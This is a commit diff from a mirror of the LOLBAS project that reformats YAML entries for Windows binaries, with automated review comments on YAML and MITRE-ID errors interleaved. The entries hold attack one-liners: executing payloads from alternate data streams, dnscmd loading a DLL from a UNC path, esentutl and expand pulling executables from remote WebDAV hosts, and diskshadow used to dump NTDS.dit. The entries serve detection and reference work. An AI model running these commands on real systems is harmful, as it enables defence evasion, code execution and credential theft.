mirror of https://github.com/LOLBAS-Project/LOLBAS, synced 2025-10-25 14:55:19 +02:00

Changed all OSBinaries according to the new template
		| @@ -13,8 +13,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\Atbroker.exe | ||||
|   - path: C:\Windows\SysWOW64\Atbroker.exe | ||||
|   - Path: C:\Windows\System32\Atbroker.exe | ||||
|   - Path: C:\Windows\SysWOW64\Atbroker.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
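Review bot: the `- Code:` item under `Code Sample:` sits at column 0 while the `- Path:` items sit at column 2, and its value is empty, so the key now parses as a one-element list containing null instead of the empty list (`[]`) the old template had; either keep `Code Sample: []` or indent a real `- Code:` entry two spaces like the other sequences. The same pattern is repeated in every file touched by this commit.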
| @@ -21,8 +21,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\bash.exe | ||||
|   - path: C:\Windows\SysWOW64\bash.exe | ||||
|   - Path: C:\Windows\System32\bash.exe | ||||
|   - Path: C:\Windows\SysWOW64\bash.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -1,5 +1,5 @@ | ||||
| --- | ||||
| Name: bitsadmin.exe | ||||
| Name: Bitsadmin.exe | ||||
| Description: Used for managing background intelligent transfer | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| @@ -37,8 +37,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\bitsadmin.exe | ||||
|   - path: C:\Windows\SysWOW64\bitsadmin.exe | ||||
|   - Path: C:\Windows\System32\bitsadmin.exe | ||||
|   - Path: C:\Windows\SysWOW64\bitsadmin.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -37,8 +37,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\certutil.exe | ||||
|   - path: C:\Windows\SysWOW64\certutil.exe | ||||
|   - Path: C:\Windows\System32\certutil.exe | ||||
|   - Path: C:\Windows\SysWOW64\certutil.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -13,8 +13,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1078 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\cmdkey.exe | ||||
|   - path: C:\Windows\SysWOW64\cmdkey.exe | ||||
|   - Path: C:\Windows\System32\cmdkey.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmdkey.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -21,8 +21,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1191 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\cmstp.exe | ||||
|   - path: C:\Windows\SysWOW64\cmstp.exe | ||||
|   - Path: C:\Windows\System32\cmstp.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmstp.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -1,21 +1,31 @@ | ||||
| --- | ||||
| Name: Control.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Binary used to launch controlpanel items in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: control.exe c:\windows\tasks\file.txt:evil.dll | ||||
|     Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1196 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1196 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\system32\control.exe    ' | ||||
|   - 'C:\Windows\sysWOW64\control.exe     ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\control.exe | ||||
|   - Path: C:\Windows\SysWOW64\control.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Control.exe executing files from alternate data streams. | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   - https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
|   - https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||||
|   - https://twitter.com/bohops/status/955659561008017409 | ||||
| Notes: Thanks to Jimmy - @bohops | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
|   - Link: https://twitter.com/bohops/status/955659561008017409 | ||||
|   - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items | ||||
|   - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
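Review bot: the `---` added as the last line of the file begins a second, empty YAML document rather than terminating the first; strict single-document loaders (PyYAML's `safe_load`, for one) reject it with "expected a single document in the stream". Use `...` as the end-of-document marker or drop the trailing line. The ` - IOC:` item is also indented one space while ` - Path:` uses two and `- Code:` zero; pick one indentation for all sequences. Both points apply to every rewritten file in this commit.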
| @@ -1,21 +1,35 @@ | ||||
| --- | ||||
| Name: Csc.exe | ||||
| Description: Compile | ||||
| Author: '' | ||||
| Description: Binary file used by .NET to compile C# code  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: csc -out:My.exe File.cs | ||||
|   - Command: csc.exe -out:My.exe File.cs | ||||
|     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. | ||||
|     Usecase: Compile attacker code on system. Bypass defensive counter measures. | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: csc -target:library File.cs | ||||
|     Description: '' | ||||
|     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. | ||||
|     Usecase: Compile attacker code on system. Bypass defensive counter measures. | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Csc.exe should normally not run a system unless it is used for development.  | ||||
| Resources: | ||||
|   - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
|   - '' | ||||
| Notes: Thanks to ? | ||||
|  | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
| Acknowledgement: | ||||
|   - Person:  | ||||
|     Handle: | ||||
| --- | ||||
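Review bot: the first command was changed to `csc.exe -out:My.exe File.cs`, but the second, `csc -target:library File.cs`, still uses the bare `csc`; make both the same. The `Acknowledgement:` entry has blank `Person:` and `Handle:` (carried over from `Notes: Thanks to ?`) and will render as an empty credit; drop it until the contributor is known. The IOC reads "should normally not run a system" (missing "on"), and the new `Description:` line carries trailing whitespace.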
| @@ -1,19 +1,28 @@ | ||||
| --- | ||||
| Name: Cscript.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Binary used to execute scripts in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: cscript c:\ads\file.txt:script.vbs | ||||
|     Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\cscript.exe | ||||
|   - c:\windows\sysWOW64\cscript.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\cscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\cscript.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Cscript.exe executing files from alternate data streams | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,19 +1,29 @@ | ||||
| --- | ||||
| Name: Dfsvc.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: ClickOnce engine in Windows used by .NET | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Missing Example | ||||
|     Description: '' | ||||
|   - Command: Missing Example  | ||||
|     Description: Missing example | ||||
|     Usecase: Use binary to bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe     ' | ||||
|   - 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe    ' | ||||
|   - 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe    ' | ||||
|   - 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
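Review bot: `Command: Missing Example` and `Description: Missing example` are placeholders that now render as if they were a real command and its description (the `Command:` line also carries trailing whitespace), and the empty ` - IOC:` under `Detection:` parses as a list holding a single null. Either fill these from the ShmooCon reference linked below or leave the lists empty, so consumers of the YAML do not have to special-case placeholder strings.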
| @@ -1,20 +1,36 @@ | ||||
| --- | ||||
| Name: Diskshadow.exe | ||||
| Description: Execute, Dump NTDS.dit | ||||
| Author: '' | ||||
| Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: diskshadow.exe /s c:\test\diskshadow.txt | ||||
|     Description: Execute commands using diskshadow.exe from a prepared diskshadow script. | ||||
|     Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit | ||||
|     Category: Dump | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows server | ||||
|   - Command: diskshadow> exec calc.exe | ||||
|     Description: Execute a calc.exe using diskshadow.exe. | ||||
|     Description: Execute commands using diskshadow.exe to spawn child process | ||||
|     Usecase: Use diskshadow to bypass defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows server | ||||
| Full Path: | ||||
|   - c:\windows\system32\diskshadow.exe | ||||
|   - c:\windows\sysWOW64\diskshadow.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\diskshadow.exe | ||||
|   - Path: C:\Windows\SysWOW64\diskshadow.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Child process from diskshadow.exe | ||||
|  - IOC: Diskshadow reading input from file | ||||
| Resources: | ||||
|   - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
| Notes: Thanks to Jimmy - @bohops | ||||
|  | ||||
|   - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
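Review bot: the MitreID/MitreLink pairs look swapped between the two commands: the `/s` script entry (Category: Dump, Usecase: exfiltrate NTDS.dit) is mapped to T1218 (Signed Binary Proxy Execution), while the `exec calc.exe` entry (Category: Execute) is mapped to T1003 (Credential Dumping); T1003 belongs on the first and T1218 on the second. The rewritten `Description: Execute commands using diskshadow.exe to spawn child process` also lost the trailing period the neighbouring entries keep.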
| @@ -1,27 +0,0 @@ | ||||
| --- | ||||
| Name: Dnscmd.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
|     Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.' | ||||
| Full Path: | ||||
|   - c:\windows\system32\Dnscmd.exe | ||||
|   - c:\windows\sysWOW64\Dnscmd.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
|   - https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp | ||||
|   - https://twitter.com/Hexacorn/status/994000792628719618 | ||||
|   - http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html | ||||
| Notes: | | ||||
|     This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. | ||||
|     Thanks to Shay Ber - ?, | ||||
|     Dimitrios Slamaris - @dim0x69, | ||||
|     Nikhil SamratAshok, | ||||
|     Mittal - @nikhil_mitt | ||||
|  | ||||
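Review bot: Dnscmd.yml is deleted here and re-created as a new 35-line file in the next hunk instead of being modified in place, so `git log` and `git blame` history for the file stops at this commit; an in-place edit (or a rename git can detect) would preserve it.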
							
								
								
									
yml/OSBinaries/Dnscmd.yml (new file, 35 lines)
							| @@ -0,0 +1,35 @@ | ||||
| --- | ||||
| Name: Dnscmd.exe | ||||
| Description: A command-line interface for managing DNS servers | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Commands: | ||||
|   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
|     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. | ||||
|     Usecase: Remotly inject dll to dns server | ||||
|     Category: Execute | ||||
|     Privileges: DNS admin | ||||
|     MitreID: T1035 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1035 | ||||
|     OperatingSystem: Windows server | ||||
| Full Path: | ||||
|   - Path: C:\Windows\System32\Dnscmd.exe | ||||
|   - Path: C:\Windows\SysWOW64\Dnscmd.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Dnscmd.exe loading dll from UNC path | ||||
| Resources: | ||||
|   - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
|   - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp | ||||
|   - Link: https://twitter.com/Hexacorn/status/994000792628719618 | ||||
|   - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html | ||||
| Acknowledgement: | ||||
|   - Person: Shay Ber | ||||
|     Handle: | ||||
|   - Person: Dimitrios Slamaris | ||||
|     Handle: '@dim0x69' | ||||
|   - Person: Nikhil SamratAshok | ||||
|     Handle: '@nikhil_mitt' | ||||
| --- | ||||
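Review bot: the acknowledgement `Person: Nikhil SamratAshok` drops the surname "Mittal" that the deleted file's Notes had (split across two lines as "Nikhil SamratAshok," / "Mittal - @nikhil_mitt"); it should read `Person: Nikhil SamratAshok Mittal`. `Handle:` for Shay Ber is left empty (a null) where the other handles are quoted strings, and `Usecase: Remotly inject dll to dns server` should read "Remotely inject a DLL into the DNS server".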
| @@ -1,28 +1,59 @@ | ||||
| --- | ||||
| Name: Esentutl.exe | ||||
| Description: Copy, Download, Write ADS, Read ADS | ||||
| Author: '' | ||||
| Description: Binary for working with Microsoft Joint Engine Technology (JET) database | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o | ||||
|     Description: Copies the source VBS file to the destination VBS file. | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: Copy  | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | ||||
|     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. | ||||
|   - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. | ||||
|   - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o | ||||
|     Description: Copies the source EXE to the destination EXE file. | ||||
|     Usecase: Extract hidden file within alternate data streams | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.   | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | ||||
|     Description: Copies the source EXE to the destination EXE file | ||||
|     Usecase: Use to copy files from one unc path to another | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\esentutl.exe | ||||
|   - c:\windows\sysWOW64\esentutl.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\esentutl.exe | ||||
|   - Path: C:\Windows\SysWOW64\esentutl.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://twitter.com/egre55/status/985994639202283520 | ||||
| Notes: Thanks to egre55 - @egre55 | ||||
|  | ||||
|   - Link: https://twitter.com/egre55/status/985994639202283520 | ||||
| Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
| --- | ||||
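Review bot: the last command (copying `adrestore.exe` from `\\live.sysinternals.com` to another WebDAV share, Category: Download) is mapped to T1096, the ID this file otherwise uses for the ADS entries, while the plain copy in the first entry uses T1105; the download entry should be T1105 as well. Two `Usecase` lines read "hide it in an alternate data stream as a defensive counter measure", which inverts the meaning; the wording used elsewhere in this commit is "to evade defensive counter measures". The ` - IOC:` item is empty, and the Description of the `\\192.168.100.100` entry has trailing whitespace.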
| @@ -1,23 +1,46 @@ | ||||
| --- | ||||
| Name: Expand.exe | ||||
| Description: Download, Copy, Add ADS | ||||
| Author: '' | ||||
| Description: Binary that expands one or more compressed files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat | ||||
|     Description: 'Copies source file to destination.' | ||||
|     Description: Copies source file to destination. | ||||
|     Usecase: Use to copies the source file to the destination file | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat | ||||
|     Description: 'Copies source file to destination.' | ||||
|     Description: Copies source file to destination. | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | ||||
|     Description: 'Copies source file to destination Alternate Data Stream (ADS).' | ||||
|     Description: Copies source file to destination Alternate Data Stream (ADS) | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\Expand.exe | ||||
|   - c:\windows\sysWOW64\Expand.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Expand.exe | ||||
|   - Path: C:\Windows\SysWOW64\Expand.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   - https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
| Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
| Acknowledgement: | ||||
|   - Person: Rahmat Nurfauzi | ||||
|     Handle: '@infosecn1nja' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
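Review bot: `Usecase: Use to copies the source file to the destination file` should read "Copies the source file to the destination file" (the wording the second entry already uses), and the first entry is categorized Download while its Usecase says nothing about the remote source. The third Description lost the trailing period the other two keep, and ` - IOC:` is left empty.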
| @@ -1,18 +1,27 @@ | ||||
| --- | ||||
| Name: Extexport.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Extexport.exe c:\test foo bar | ||||
|     Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll' | ||||
|     Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll | ||||
|     Usecase: Execute dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Program Files\Internet Explorer\Extexport.exe    ' | ||||
|   - C:\Program Files\Internet Explorer(x86)\Extexport.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Program Files\Internet Explorer\Extexport.exe | ||||
|   - Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Extexport.exe loads dll and is execute from other folder the original path | ||||
| Resources: | ||||
|   - http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ | ||||
| Notes: Thanks to Adam - @hexacorn | ||||
|  | ||||
|   - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
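Review bot: the `Full Path` entry `C:\Program Files\Internet Explorer(x86)\Extexport.exe` is not a real location; the 32-bit install lives under `C:\Program Files (x86)\Internet Explorer\Extexport.exe`. The top-level `Description:` is now empty where the old file at least had "Execute", and the IOC "Extexport.exe loads dll and is execute from other folder the original path" needs rewording, e.g. "Extexport.exe loading a DLL from a folder other than its own". The unquoted Description also dropped the colon that introduced the DLL name list.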
| @@ -1,24 +1,47 @@ | ||||
| --- | ||||
| Name: Extrac32.exe | ||||
| Description: Add ADS, Download | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | ||||
|     Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' | ||||
|     Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream.  | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
